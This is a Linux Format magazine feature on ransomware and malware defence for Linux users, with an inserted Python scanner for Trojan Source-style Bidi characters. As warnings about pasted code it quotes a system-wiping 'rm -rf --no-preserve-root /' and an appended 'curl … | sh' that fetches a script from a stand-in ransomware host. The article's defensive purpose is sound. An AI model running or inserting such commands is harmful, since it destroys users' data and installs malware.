Combat Malware!
Linux Format | February 2022
Jonni Bidwell wants to turn the tide on ransomware in 2022. It appears he has his work cut out for him…
By Jonni Bidwell

These days we’re never far from cybercrime-themed headlines. What was very much in the realms of sci-fi a couple of decades ago has become almost commonplace today.

In the past few years we’ve seen large-scale attacks against Ukraine’s power grid, Sony Pictures, the Colonial Oil Pipeline, JBS SA (the world’s largest meat supplier) and South African shipping firm Transnet. Such attacks often aim to cause damage and disruption (the power grid attack left hundreds of thousands without power for hours). And sometimes the aim is political. For example, the Sony Pictures hack is widely believed to have originated from North Korea, with hackers demanding The Interview (a Kim Jong Un-themed comedy) be withdrawn. Which it was, although not before gigabytes of embarrassing emails and personal information on Sony Pictures staff were shared.

Latterly though, hackers are financially motivated. They want their targets to pay (usually in cryptocurrency), either to restore access to their systems, or to avoid sensitive information being publicised. The last three attacks mentioned above all occurred in 2021, and are examples of such ransomware attacks. Ransom demands can be high too: the Colonial Pipeline hackers received $10 million (most of which was recovered), and prolific (but now defunct) ransomware outfit REvil requested $70 million following a supply chain attack on managed software company Kaseya. Thanks to the ease with which fiat currency could be exchanged for Bitcoin, ransomware attacks launched against home users have proven profitable, too.

The tired old line “Linux doesn’t get viruses” (or ransomware, or whatever other kind of badware you might care to name) was never really true. Internet-facing Linux servers have long been a target for all kinds of mischief, and with so many Linux-powered Internet of Things devices joining the party, such intrusions are only going to increase.

Directed attacks against home users are waning, primarily because there are much more lucrative targets out there, but that’s no excuse for complacency. We’ll show you the modern threatscape, refresh some best practices and hopefully get your 2022 off to the safest start possible. So let’s get to it!

Ransomware’s evolving

It’s bad and it’s getting worse. But running outdated versions of Windows doesn’t help anyone.

A few years back guilt-ware attacks were common. Unsuspecting users would log into their machines and be greeted with a banner stating they were under investigation for nebulous crimes: anything from piracy, to pornography, to promulgation of terror materials. But don’t worry, says the warning – all of this will go away if you just wire some cryptocoins to this address.

The message goes on to explain how to acquire said coins, and warns that if you don’t pay, you’ll be arrested. That these kinds of attacks were ever successful (and sometimes still are) speaks volumes about people’s gullibility. It also shows some people have some quite funky ideas about how justice works. Yet we shouldn’t be so dismissive – there’s some psychology behind this.

There’s a widely held theory that everyone has some latent guilt about something they’ve done in the past and not ‘fessed up to. And tapping into this with a scary message can make the subject feel rumbled. Detectives take advantage of this (and all kinds of other techniques) when questioning suspects.

Still, it’s the kind of message that lots of people (especially anyone used to browsing the internet without a pop-up blocker), will just close and ignore. So later evolutions of this attack would go a stage further, either locking the victim out of the machine entirely (forcing the user to choose between a complete reinstall or a quick ransom payment) or encrypting any user documents it finds. This is what ransomware typically refers to today. Thanks to networking (and a rich underground scene in the trade of network exploits) damage may quickly spread to other machines too, and before you know it a stray click on a single machine might bring about a network-wide incident.

Naturally, businesses are a much more lucrative target with (according to Coveware) the average payout in 2020 being $233,817. Attacks on home users might ask for anywhere between the equivalent of $200 to $2,000, which is why they don’t tend to grab the headlines anymore. Home users may also feel uncomfortable about reporting a ransomware attack, but they shouldn’t. Even if the authorities can’t help, reporting the incident (to the likes of CISA in the US or the NCA in the UK) will at least help them measure the scale of the threat. For businesses, the projected cost of recovery might well exceed the ransom, at which point it makes business sense to cough up. Insurers are starting to recognise this now and some (controversially) even include ransomware payments in their policies.

HOW TO BECOME INFECTED

Unfortunately, most if not all ransomware outbreaks start with human error. This might be through social engineering, spear phishing campaigns (where high-profile individuals are targeted and tricked into handing over data with seemingly legitimate messages), rogue browser add-ons, dodgy websites, dodgy mobile apps, poisoned email attachments… the list goes on.

Sometimes human error upstream is to blame. For example, SIM-swapping attacks might involve tricking a customer service agent into porting a number to another SIM. This might then enable 2FA to be compromised on all of the accounts linked to that number. Whatever the method, once a human has erred, there’s not a lot even the most secure system in the world can do to remedy things.

The WannaCry outbreak in 2017, which nearly crippled the UK’s largely Windows 7-powered NHS, was a little different, since its spread was mostly as a result of a vulnerability in the SMB protocol. That vulnerability was actually known to NSA researchers, who named it EternalBlue. Unfortunately someone (perhaps a rogue contractor) made away with its details. And later, just before WannaCry hit, the vulnerability was published by a group calling themselves the ShadowBrokers. EternalBlue, which enables privileged code execution on remote systems, was also leveraged in the NotPetya ransomware outbreak, which disrupted global shipping.

Safe hex

Taking a few basic precautions is much easier than cleaning up a nasty digital infection

Basic internet hygiene is the single best defence for home users against ransomware, and malware in general. Unfortunately “the basics” encompasses many different areas these days that deserve their own cover features. Still, let’s at least try and summarise them here.

We hope you’re not the sort of person to click random links in suspect-looking emails. At the very least, one should hover over them (or copy and paste the link into a text document) to make sure it links to a legitimate domain (and not something using deceptive characters like goog1e.com, or deceptive subdomains like google.domain.cm). Speaking of copying and pasting, be extra careful when doing so with code excerpts. Not only is there the risk the command itself will do something bad, like rm -rf --no-preserve-root /, but thanks to the wonders of CSS and Unicode it’s easy to inject invisible characters that you won’t see until they’re pasted (and conceivably not even then). Just appending ; curl ransomware.xyz/pwn.sh | sh is one way to stop a benign command being so benign. Not a real URL, by the way. Bidirectional (Bidi) character encodings have been used to obfuscate file extensions of email-borne malware in the past.

Passing on the compromise

And now a more insidious form of this attack has been discovered, dubbed Trojan Source. It turns out that most compilers, while supporting and encouraging Unicode source files, don’t really have any mitigations against obfuscated Bidi additions. So a lazy developer might copy and paste a code snippet from Stack Overflow, then not only risk having their own compiler exploited, but if they then upload that code to a popular project, the whole well becomes poisoned. You can read about it at https://krebsonsecurity.com/2021/11/trojan-sourcebug-threatens-the-security-of-all-code. The scope of the attack is huge, because it enables essentially arbitrary, invisible code to be added. This might be keyloggers, ransomware or any number of other bad things.
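The practical defence against both the copy-paste trick above and Trojan Source is to refuse Bidi control and zero-width characters in source before it is compiled or committed. The scanner below is an added example (not code from the article or the Trojan Source paper); the C snippet it scans is constructed here, with Bidi controls placed inside a comment in the style of the paper’s “early return” examples.

```python
"""Flag Unicode Bidi controls and zero-width characters in source text,
as a pre-commit hook or CI step would. Added example, not from the article."""
import unicodedata

# Bidi embedding, override and isolate controls abused by Trojan Source...
BIDI_CONTROLS = {
    "\u202A", "\u202B", "\u202C", "\u202D", "\u202E",  # LRE RLE PDF LRO RLO
    "\u2066", "\u2067", "\u2068", "\u2069",            # LRI RLI FSI PDI
}
# ...plus zero-width characters that survive a copy-and-paste unseen.
ZERO_WIDTH = {"\u200B", "\u200C", "\u200D", "\u2060", "\uFEFF"}
SUSPICIOUS = BIDI_CONTROLS | ZERO_WIDTH


def find_invisible_chars(source: str):
    """Return (line, column, code point, Unicode name) for each hit.
    Lines and columns are 1-based; columns count characters, not bytes."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for col, ch in enumerate(line, start=1):
            if ch in SUSPICIOUS:
                name = unicodedata.name(ch, "UNKNOWN")
                hits.append((lineno, col, f"U+{ord(ch):04X}", name))
    return hits


def is_clean(source: str) -> bool:
    """True when the text contains none of the suspicious code points."""
    return not find_invisible_chars(source)


# Constructed sample: an RLO and two isolates hidden in a C comment so that
# an editor renders the line differently from the bytes the compiler parses.
TROJAN_SAMPLE = (
    "int check_access(int is_admin) {\n"
    "    /* \u202E } \u2066 if (is_admin) \u2069 \u2066 begin admins only */\n"
    "    return 1;\n"
    "}\n"
)

if __name__ == "__main__":
    for lineno, col, cp, name in find_invisible_chars(TROJAN_SAMPLE):
        print(f"line {lineno}, col {col}: {cp} {name}")
```

Run over a repository (for example, from a pre-commit hook that reads each staged file) it rejects the commit when `is_clean` returns False; a plain ASCII file produces no hits.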

No matter how web-savvy you are, you can always take steps to boost your browsing security. No one likes ads, and no one likes that the networks behind them are on occasion compromised to instead spew malicious JavaScript. The most popular ad-blocker for Firefox is uBlock Origin, and we heartily recommend it.

There are a number of other add-ons you might want to use to protect privacy. But be aware that the Firefox add-ons repository and Chrome Web Store aren’t monitored for malicious code. So exercise caution when downloading new add-ons. Even genuine add-ons can contain code that can be exploited, either by a rogue add-on or a maliciously crafted web page. A study entitled DoubleX: Statically Detecting Vulnerable Data Flows in Browser Extensions at Scale found 184 extensions that could be exploited this way. An unchecked eval function in a privileged extension might allow a web page to do anything that extension can. Likewise, a stray tabs.executeScript() call would allow remote code inclusion.
